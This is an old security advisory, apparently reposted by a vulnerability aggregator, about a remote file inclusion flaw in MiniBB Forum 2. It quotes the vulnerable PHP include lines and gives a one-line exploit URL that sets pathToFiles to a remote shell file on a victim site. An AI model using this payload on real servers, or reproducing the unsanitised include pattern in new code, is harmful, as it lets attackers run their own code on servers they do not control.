New Bug MiniBB Forum <= 2 Remote File Include (index.php)

2006-11-1400:00:00

vulners.com

Title : MiniBB Forum <= 2 Remote File Include (index.php)
########################################################################
#######

Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}

Sorce Code:
http://www.minibb.net/download.php?file=minibb20

Affected software description :


Application : MiniBB Forum 2 &#40;index.php&#41;version :
version [ 2 ]
exploit :Remote File Include
------------------------------------------------------------------------
-----
Vulnerable Code:
include &#40;$pathToFiles.&#39;setup_&#39;.$DB.&#39;.php&#39;&#41;;
include &#40;$pathToFiles.&#39;bb_cookie.php&#39;&#41;;
include &#40;$pathToFiles.&#39;bb_functions.php&#39;&#41;;
include &#40;$pathToFiles.&#39;bb_specials.php&#39;&#41;;
----------------------------------------------------------------------
Exploit:
http://www.VicTim.com/[Script_Path]/index.php?pathToFiles=Shell.txt?



------------------------------------------------------------------------
----

greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco

Special Greeting:AsbMay&#39;s Group

channel:www.asb-may.net

contact:spoonman500[at]hotmail[dot]com

_________________________________________________________________
MSN Hotmail sur i-mode™ : envoyez et recevez des e-mails depuis votre 
telephone portable ! http://www.msn.fr/hotmailimode/

JSON

New Bug MiniBB Forum &lt;= 2 Remote File Include &#40;index.php&#41;

Sorce Code: http://www.minibb.net/download.php?file=minibb20

New Bug MiniBB Forum <= 2 Remote File Include (index.php)

Sorce Code:
http://www.minibb.net/download.php?file=minibb20